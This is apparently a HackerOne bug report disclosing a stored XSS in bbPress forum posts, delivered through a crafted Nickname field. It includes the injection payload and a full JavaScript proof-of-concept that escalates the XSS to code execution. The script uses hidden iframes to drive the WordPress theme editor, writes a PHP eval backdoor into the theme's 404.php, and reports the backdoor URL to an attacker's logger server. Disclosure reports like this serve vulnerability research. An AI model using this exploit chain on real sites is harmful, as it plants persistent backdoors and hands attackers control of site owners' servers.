Automattic: [bbPress] Stored XSS in any forum post.

2016-07-1312:38:02

psych0tr1a

hackerone.com

3.5 Low

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

0.004 Low

EPSS

Percentile

71.3%

JSON

#Intro:
Encouraged by the success of cure53 and their reward, i start the research plugins in your scope. And almost immediately i found critical Stored XSS, which of course leeds to privelege escalation or PHP code execution. This vulnerability doesnt requres “special” preveleges like CVE-2015-5622. To demonstrate how this vulnerability elementary for expluatation i write a XSS to Shell exploit.

#Steps to reproduce the XSS:

Send any message on topic or start new topic.
Edit this message.
Open http://localhost/wordpress/?bbp_user=%YOUR_USER_ID%&edit=1

Edit your “Nickname” to:

user1"onmouseover="alert(1);remove()"style="position:absolute;left:0;top:0;margin-top:-100%;margin-left:-100%;width:5000px;height:5000px"

Change your “Display Name” to new “Nickname”, save and return to thread with your message.

#Screenshot:
{F10472} (In attachment)

#XSS to RCE PoC exploit:

	var yourServer = "%Path to your logger%"

	var payload = "&lt;?php eval($_GET['wp']); ?&gt;"+"\n";
	SitePath = document.head.innerHTML.match(/rel=\"pingback\" href=\"(.*?)\/xmlrpc.php\"/m)[1]
	function eas(){ // edit and save
		ov = window.frames.win404.document.getElementById('newcontent').value
		window.frames.win404.document.getElementById('newcontent').value = payload + ov
		document.getElementsByName('win404')[0].setAttribute("onload","");
		window.frames.win404.document.getElementsByName('submit')[0].click()
		((new Image).src=yourServer+"?message=Check your backdoor here: "+SitePath+"/wp-content/themes/"+themeName+"/404.php?wp=phpinfo();")
	}

	function pao(){ // parse and open
		ewin = window.frames.editor.contentWindow || window.frames.contentDocument
		url404 = unescape(ewin.document.getElementById('templateside').getElementsByTagName('a')[0].href)
	        filepar = url404.match(/\?file\=(.*?)\&/m)[1]
		if(filepar.length&gt;10){
			themeName = url404.match(/file\=\/themes\/(.*?)\//m)[1]
		}
		else{
			themeName = url404.match(/theme\=(.*?)$/m)[1]
		}
		var win404 = document.createElement("iframe");
		win404.style.opacity=0
		win404.name = 'win404';
		win404.src = url404
		win404.setAttribute("onload","eas();this.onload=''");
		document.body.appendChild(win404);
	}
	
	var editor = document.createElement("iframe");
	editor.style.opacity=0
	editor.name = 'editor';
	editor.src = SitePath+"/wp-admin/theme-editor.php";
	editor.setAttribute("onload","pao();this.onload='';");
	document.body.appendChild(editor);

Best regards!